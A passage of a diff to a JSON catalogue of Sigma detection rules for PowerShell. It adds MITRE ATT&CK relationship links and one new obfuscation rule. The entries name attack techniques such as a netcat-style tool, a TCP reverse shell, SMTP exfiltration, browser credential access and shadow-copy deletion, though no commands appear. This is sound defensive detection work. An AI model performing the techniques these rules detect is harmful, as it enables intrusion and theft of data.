"f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", "value": "Delete Volume Shadow Copies Via WMI With PowerShell" }, @@ -17704,6 +22027,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell" }, @@ -17728,6 +22060,15 @@ "attack.t1074.001" ] }, + "related": [ + { + "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell" }, @@ -17752,6 +22093,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "value": "Suspicious PowerShell Download" }, @@ -17776,6 +22126,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", "value": "Renamed Powershell Under Powershell Channel" }, @@ -17824,6 +22183,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", "value": "Nslookup PowerShell Download Cradle" }, @@ -17850,6 +22218,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", "value": "Alternate PowerShell Hosts - PowerShell Module" }, @@ -17876,6 +22253,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module" }, @@ -17892,9 +22278,9 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://www.mdeditor.tw/pl/pgRt", "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" ], "tags": [ @@ -17902,6 +22288,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", "value": "Bad Opsec Powershell Code Artifacts" }, @@ -17952,6 +22347,15 @@ "attack.t1140" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", "value": "PowerShell Decompress Commands" }, @@ -17976,6 +22380,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule" }, @@ -18002,6 +22415,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module" }, @@ -18028,6 +22450,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module" }, @@ -18052,6 +22483,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", "value": "Suspicious Get Local Groups Information" }, @@ -18077,6 +22517,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", "value": "Suspicious Get-ADDBAccount Usage" }, @@ -18093,8 +22542,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/besimorhino/powercat", "https://nmap.org/ncat/", + "https://github.com/besimorhino/powercat", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" ], @@ -18103,6 +22552,15 @@ "attack.t1095" ] }, + "related": [ + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", "value": "Netcat The Powershell Version - PowerShell Module" }, @@ -18127,6 +22585,15 @@ "attack.t1070.003" ] }, + "related": [ + { + "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", "value": "Clear PowerShell History - PowerShell Module" }, @@ -18153,6 +22620,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2f211361-7dce-442d-b78a-c04039677378", "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module" }, @@ -18179,6 +22655,22 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", "value": "Remote PowerShell Session (PS Module)" }, @@ -18203,6 +22695,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6942bd25-5970-40ab-af49-944247103358", "value": "Suspicious Get Information for SMB Share - PowerShell Module" }, @@ -18229,6 +22730,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module" }, @@ -18255,6 +22765,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module" }, @@ -18278,6 +22797,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", "value": "Suspicious PowerShell Download - PowerShell Module" }, @@ -18304,6 +22832,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "value": "Invoke-Obfuscation Via Stdin - PowerShell Module" }, @@ -18330,6 +22867,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module" }, @@ -18353,6 +22899,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module" }, @@ -18377,6 +22932,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module" }, @@ -18403,6 +22967,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module" }, @@ -18429,6 +23002,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module" }, @@ -18452,6 +23034,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module" }, @@ -18502,6 +23093,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module" }, @@ -18526,6 +23126,15 @@ "attack.t1049" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", "value": "Use Get-NetTCPConnection - PowerShell Module" }, @@ -18552,6 +23161,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module" }, @@ -18576,6 +23194,15 @@ "attack.t1074.001" ] }, + "related": [ + { + "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module" }, @@ -18600,6 +23227,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", "value": "Change User Agents with WebRequest" }, @@ -18624,6 +23260,15 @@ "attack.t1027.009" ] }, + "related": [ + { + "dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", "value": "Powershell Token Obfuscation - Powershell" }, @@ -18649,11 +23294,20 @@ "attack.t1546" ] }, + "related": [ + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0332a266-b584-47b4-933d-a00b103e1b37", "value": "Suspicious Get-WmiObject" }, { - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell logs", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", "meta": { "author": "James Pemberton / @4A616D6573", "creation_date": "2019/10/24", @@ -18674,8 +23328,17 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", - "value": "Usage Of Web Request Commands And Cmdlets - PowerShell" + "value": "Usage Of Web Request Commands And Cmdlets - ScriptBlock" }, { "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", @@ -18698,6 +23361,15 @@ "attack.t1556.002" ] }, + "related": [ + { + "dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "value": "Powershell Install a DLL in System Directory" }, @@ -18722,6 +23394,15 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", "value": "PowerShell WMI Win32_Product Install MSI" }, @@ -18748,6 +23429,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell" }, @@ -18773,6 +23463,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", "value": "PowerShell Remote Session Creation" }, @@ -18821,6 +23520,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script" }, @@ -18845,6 +23553,15 @@ "attack.t1564.003" ] }, + "related": [ + { + "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", "value": "Suspicious PowerShell WindowStyle Option" }, @@ -18861,8 +23578,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" ], @@ -18871,6 +23588,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "78aa1347-1517-4454-9982-b338d6df8343", "value": "Powershell MsXml COM Object" }, @@ -18896,6 +23622,15 @@ "attack.t1497.001" ] }, + "related": [ + { + "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3", "value": "Powershell Detect Virtualization Environment" }, @@ -18922,9 +23657,53 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell" }, + { + "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_alias_obfscuation.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1027", + "attack.t1059.001" + ] + }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", + "value": "Potential PowerShell Obfuscation Using Character Join" + }, { "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", "meta": { @@ -18938,10 +23717,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/08/ryuks-return", + "https://adsecurity.org/?p=2277", "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", "https://powersploit.readthedocs.io/en/stable/Recon/README", - "https://adsecurity.org/?p=2277", + "https://thedfirreport.com/2020/10/08/ryuks-return", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" ], "tags": [ @@ -18949,6 +23728,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", "value": "Malicious PowerView PowerShell Commandlets" }, @@ -18975,6 +23763,22 @@ "attack.t1136.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61", "value": "PowerShell Create Local User" }, @@ -18991,8 +23795,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/bohops/status/948061991012327424", "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml" ], "tags": [ @@ -19000,6 +23804,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4cd29327-685a-460e-9dac-c3ab96e549dc", "value": "Execution via CL_Invocation.ps1 - Powershell" }, @@ -19024,6 +23837,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", "value": "PSAsyncShell - Asynchronous TCP Reverse Shell" }, @@ -19040,9 +23862,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" ], "tags": [ @@ -19050,6 +23872,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", "value": "Powershell Exfiltration Over SMTP" }, @@ -19067,8 +23898,8 @@ "logsource.product": "windows", "refs": [ "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" ], "tags": [ @@ -19093,8 +23924,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" ], "tags": [ @@ -19151,6 +23982,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ed965133-513f-41d9-a441-e38076a0798f", "value": "Suspicious PowerShell Invocations - Generic" }, @@ -19175,6 +24015,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", "value": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction" }, @@ -19199,6 +24048,15 @@ "attack.t1119" ] }, + "related": [ + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", "value": "Automated Collection Command PowerShell" }, @@ -19215,11 +24073,11 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", - "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", - "http://woshub.com/manage-windows-firewall-powershell/", + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "http://woshub.com/manage-windows-firewall-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" ], "tags": [ @@ -19227,6 +24085,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", "value": "Windows Firewall Profile Disabled" }, @@ -19252,6 +24119,15 @@ "attack.t1136.002" ] }, + "related": [ + { + "dest-uuid": "7610cada-1499-41a4-b3dd-46467b68d177", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", "value": "Manipulation of User Computer or Group Security Principals Across AD" }, @@ -19276,6 +24152,15 @@ "attack.t1070.003" ] }, + "related": [ + { + "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "602f5669-6927-4688-84db-0d4b7afb2150", "value": "Disable Powershell Command History" }, @@ -19325,6 +24210,15 @@ "attack.t1555.003" ] }, + "related": [ + { + "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", "value": "Access to Browser Login Data" }, @@ -19342,9 +24236,9 @@ "logsource.product": "windows", "refs": [ "https://youtu.be/5mqid-7zp8k?t=2481", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" ], "tags": [ @@ -19375,6 +24269,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + 